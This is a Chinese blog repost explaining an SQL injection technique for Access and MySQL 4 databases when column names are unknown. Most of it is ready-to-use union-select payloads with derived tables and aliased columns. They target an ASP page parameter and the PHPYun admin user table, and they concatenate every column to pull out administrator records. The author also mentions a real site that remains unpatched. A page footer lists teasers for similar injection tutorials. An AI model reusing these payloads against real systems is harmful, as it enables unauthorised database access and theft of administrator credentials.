access和mysql4注入小技巧

最新推荐文章于 2024-09-14 19:55:29 发布
最新推荐文章于 2024-09-14 19:55:29 发布
阅读量115 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/mujj/articles/4084959.html
版权

技巧使用时间:知道“表名”但是猜不到“列名”的时候

前几天看了文章:http://www.91ri.org/11120.html,这里提到了access的注入小技巧,如果看懂了~大家就忽略前半篇吧~~
然后今天想想,mysql4是没有information_schema的,也就是说表名和列名和access一样,要靠猜,那么~~这个技巧或许可以用上

ACCESS篇:
不知道大家还记得http://sb.f4ck.org/thread-6017-1-1.html 这篇文章么? access偏移注入,对的这里有个前提,想要注入的表(一般是管理员表)比当前表(比如文章表)select的字段要少

但是,如果使用了今天说的这个小技巧,就可以无视这个限制~~~

前提还是一样的,需要知道表名~~比如这里是admin~~(PS:我也不知道怎么这么久了他还是不补注入漏洞。。。)

首先,我们之前注入时候就知道这里有8列,因此直接构造如下语句:

  1. x.asp?id=90 union select 1,2,3,4,5,6,7,8 from(select * from admin order by 1)
复制代码


我们来分解下:

  1. union select 1,2,3,4,5,6,7,8 是匹配前面的列数
  2. from(x)是使用派生表~~
  3. select * from admin order by 1 是构造派生表
复制代码



这里我们看下order by 5:


很明显,不再显示列了,说明没有5列,我们之前文章中也说了,admin只有4列
于是我们构造:


  1. x.asp?id=90 union select 1,2,3,4,5,6,7,8 from(select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 from admin where 1=2 union select * from admin)
复制代码



还是分解下:

  1. union select 1,2,3,4,5,6,7,8 是匹配前面的列数
  2. select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 是将每一列做了别名,用途是之后可以用别名来引用我们不知道的列名
  3. where 1=2 目的是将前面的别名条件用假,从而显示后面的union select的内容
  4. union select * from admin 联合查询,得到真正需要的admin表所有列内容
复制代码




接下来就要用到我们的别名了:
这里撸主没有测试成功文章中所说的”

field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5

“方法,只能直接使用别名,可能是撸主的access太烂了吧……
于是:

  1. .asp?id=-90 union select 1,a_4
  2. ,a_3,4,5,6,7,8 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 from admin where 1=2 union select * from admin)
复制代码



这里其实就是将a_4,a_3显示出来而已,至于为什么是a_4,a_3,这就是一次次试验出来的……下次可能就是a_1,a_2


==================================================================================

MYSQL篇:

再来说说mysql,由于mysql4是没有information_schema的,因此或许可能会用到吧~
就拿php_yun做演示吧:

我们随便select两个字段:

  1. SELECT id,name FROM `phpyun_description`where id = 1 union select 1,2 from (select * from phpyun_admin_user order by 1)a
复制代码


这里注意与access不一样的地方,mysql不会自动给派生表定义别名,因此我们需要在最后加一个a,或者as a
不然会出什么问题,读者可以自己试试~~~


然后我们需要猜phpyun_admin_user的列数

  1. SELECT id,name FROM `phpyun_description`where id = 1 union select 1,2 from (select * from phpyun_admin_user order by 6)a
复制代码



猜出来是6列



之后我们构造“利用别名列查询出所有字段的子语句”:

  1. select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user
复制代码





最后我们将其拼接起来:

  1. SELECT id,name FROM `phpyun_description`where id = 1 and 1=2 union select a_3,a_4 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user)a
复制代码




恩,既然是mysql,就可以一起显示啦~~利用concat,就不需要一个个测试到底是那一列了

  1. SELECT id,name FROM `phpyun_description`where id = 1 and 1=2 union select 1,concat(a_1,0x23,a_2,0x23,a_3,0x23,a_4,0x23,a_5,0x23,a_6) from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user)a
复制代码


转载于:https://www.cnblogs.com/mujj/articles/4084959.html

weixin_30809173
关注
MySQL、MSSQL、Oracel、PostgreSQL、Access数据库注入区别
糖小喵
04-21 584
注释符 MySQL: 单行:# 、多行: /**/ SQLServer:单行:-- 多行: /**/ Oracle:单行:-- 多行: /**/ PostgreSQL:单行:-- 多行: /**/ Access:无注释符 数据库端口 MySQL: 3306 SQLServer: 1433 Oracle:1521 PostgreSQL:5432 Acc...
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2465
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入数据库类型分:sql:oracle、MySQL、mssql、access、sq...
MySql(四)SQL注入
爱是与世界平行
03-06 751
MySql(四)SQL注入一、SQL注入简介二、应用开发中可以采取的应对措施2.1 PrepartStatement+Bind-Variable2.2 使用应用程序提供的转换函数2.3 自定义函数进行校验 一、SQL注入简介 结构化查询语言( SQL)是一种用来和数据库交互的文本语言。SQL注入( SQL Injection )就是利用某些数据库的外部接口将用户数据插入到实际的数据库操作语言(SQ...
mysql 4 注入_MySQL 注入学习
weixin_36383467的博客
01-27 177
系统学习MySQL注入,记下笔记。字符串相关函数用法left(a,b)从左侧截取a的前b位substr(a,b,c)从b位置开始,截取字符串a的c长度mid(a,b,c)同substrascii()将某个字符转换为ascii值ord()同ascii数学相关函数名用法exp(x)此函数返回e(自然对数的底)到X次方的值懒,用到什么查什么吧。符号特殊符号12345678''""(){}\``%注释符号...
mysql 4 注入_accessmysql4注入技巧
weixin_42578963的博客
01-20 145
技巧使用时间:知道“表名”但是猜不到“列名”的时候前几天看了文章:http://www.91ri.org/11120.html,这里提到了access注入技巧,如果看懂了~大家就忽略前半篇吧~~然后今天想想,mysql4是没有information_schema的,也就是说表名和列名和access一样,要靠猜,那么~~这个技巧或许可以用上ACCESS篇:不知道大家还记得http://sb.f4...
学习笔记五-sql之access和mssql注入
weixin_34194087的博客
11-02 269
1,access数据库的介绍关系数据库管理系统,微软的小型数据库优势:提高速度,减少代码量,避免使用过程调用缺陷:数据过大,性能下降,数据库刷写导致问题,安全不行 后缀名为*.mdb打开工具:辅臣,破障搭建平台:小旋风aspweb工具2,access数据库调用分析asp网站,(id=)参数传递,看到参数,看查询语句,使用破障分析数据代码审计看是否有过滤3,access注入原理首先判断是否存在注...
mssql,access,mysql手工注入详解
10-18
常见的MySQL注入技术包括错误基注入,利用服务器返回的错误信息构造SQL语句,以及时间基注入,通过查询执行时间来判断条件。 4. **手工注入过程** 手工注入通常涉及以下步骤: - **信息收集**:攻击者会尝试了解...
sqlmap 跑access_Sqlmap小技巧
weixin_39940688的博客
01-17 386
前言Sqlmap 是python写的一个开源测试工具,因支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access 等多个份额较多的数据库,且功能强悍被众多安全测试者所使用,在现实的测试环境中,有很多测试者遇到注入都习惯使用Sqlmap去进行测试,假如 Sqlmap无法跑出来,就不进行深入测试了,本文笔者将拿一个真实遇到的...
史上最完整最全的MySQL注入教程.docx
11-25
本教程将深入讲解这一主题,帮助初学者理解如何识别、利用和防范MySQL注入。 ### 1. 什么是数据库数据库(DB)是一个用于存储和管理数据的应用程序。它提供了API接口,让开发者可以方便地创建、读取、更新和...
Access数据库SQL注入小结
热门推荐
HappyOrange2014的专栏
11-10 1万+
Access数据库SQL注入小结这里总结一下学到的Access数据库注入的知识点。
accessmysql区别
03-06
简要列出了accessmysql的各种优缺点对比
适用于ACCESSMySQL数据库的偏移注入
qq_42097777的博客
04-01 458
## 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询,偏移注入同样如此 # 偏移注入还要用到"table.*" 他的意思是代表了表里的所有字段 ###运用场景是:权限不足无法获取系统表内的信息,和工具无法查出字段 先判断是否有注入点,靶场第一题,用url传参被拒绝,采用cookie进行传参 1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有...
mysql 4.0注入_史上最水的MYSQL注入总结
weixin_39548787的博客
01-19 254
[TOC]0x1 Forward​ 这篇文章的雏形我是发在了t00ls,后来我想了下还有其他挺有意思的内容还没总结进来,于是就有了一篇升级版(ps水货本质还是没变),希望有需要的师傅可以阅读看看。0x2 MySQL 基础知识1.字符串截取函数left(str,index) //从左边第index开始截取right(str,index) //从右边第index开始截取substring(str...
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
SQL注入的成因及原理浅析
18年3月萌新白帽子
06-02 6334
一、首先先介绍一下SQL注入的思维导图:二、SQL注入的成因三、SQL注入的原理用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为某成因可以归结为以下两个原因叠加造成的:1.程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造SQL语句。2.未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL查询语句中。四、哪里可能存在SQL注入?1.任何客户...
SQL注入攻击实现原理与攻击过程详解
diligentcat的专栏
09-09 2818
SQL注入攻击实现原理与攻击过程详解     结构化查询语言(SQL)是一种用来和数据库交互的文本语言,SQL Injection就是利用某些数据库的外部接口把用户数据插入到实际的数据库操作语言当中,从而达到入侵数据库乃至操作系统的目的。它的产生主要是由于 程序对用户输入的数
4.网络编程
最新发布
weixin_45476535的博客
09-14 188
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
全收录:Access SQL注入技巧与规避策略
由于Access SQL在某些功能上的限制,注入攻击者可能需要利用特定的技巧来实现他们的目的。 首先,Access中并没有像其他数据库系统那样的标准注释符号,如`/*`、`--`或`#`。文档建议使用空字符`NULL` (%00)作为替代...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值